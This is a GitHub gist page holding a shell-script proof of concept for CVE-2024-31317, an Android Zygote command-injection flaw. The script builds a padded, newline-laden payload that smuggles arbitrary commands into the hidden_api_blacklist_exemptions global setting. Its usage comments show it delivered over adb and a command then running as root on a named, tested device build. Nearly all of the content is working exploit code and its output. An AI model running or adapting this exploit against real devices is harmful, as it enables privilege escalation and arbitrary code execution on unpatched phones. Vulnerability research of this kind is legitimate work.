Created
July 3, 2024 03:40
-
-
Save rabits/eef4fad0bd024786a3afde2bc1f32b7e to your computer and use it in GitHub Desktop.
CVE-2024-31317 PoC 1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
# PoC prepares the payload of commands to execute through the zygote injection CVE-2024-31317: | |
# https://rtx.meta.security/exploitation/2024/06/03/Android-Zygote-injection.html | |
# | |
# Tested on honor-magic-v2_ver-n49; Build 7.2.0.108(C636E1R2P2); Sec patch Dec 1, 2023 | |
# | |
# USAGE (android 13, with pre-13 use 12200 instead of 32768) | |
# host$ adb push payload.sh /sdcard/ | |
# host$ adb shell | |
# shell$ settings put global hidden_api_blacklist_exemptions "$(sh /sdcard/payload.sh 8192 32768 sh -c 'sleep 200')" | |
# [disconnect (zygote crash)] | |
# host$ adb shell | |
# shell$ ps -A | grep sleep | |
# root 480 2 0 0 0 0 S [adspsleepmon-wo] | |
# root 20055 19988 11122152 3792 0 0 S sleep | |
buffer_size=$1 | |
shift | |
zygote_read_abort_size=$1 | |
shift | |
cmd_len=$# | |
cmd="$1" | |
shift | |
prefix="6 --set-api-denylist-exemptions " | |
prefix_len=$(echo -n "$prefix" | wc -c) | |
add_chars=$(($buffer_size - $prefix_len - 1)) | |
payload=$(printf "\n\n\n\n\n%${add_chars}s" $cmd_len | tr ' ' A) | |
echo | |
for arg in "$@"; do | |
payload="$payload\n$(echo "$arg")" | |
done | |
payload="$payload\n$(echo "$cmd")" | |
echo "$payload" | |
payload_len=$(echo "$payload" | wc -c) | |
add_chars=$(($zygote_read_abort_size - ($prefix_len + $payload_len))) | |
printf "%${add_chars}s" ',' | tr ' ' ',' | |
echo X |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment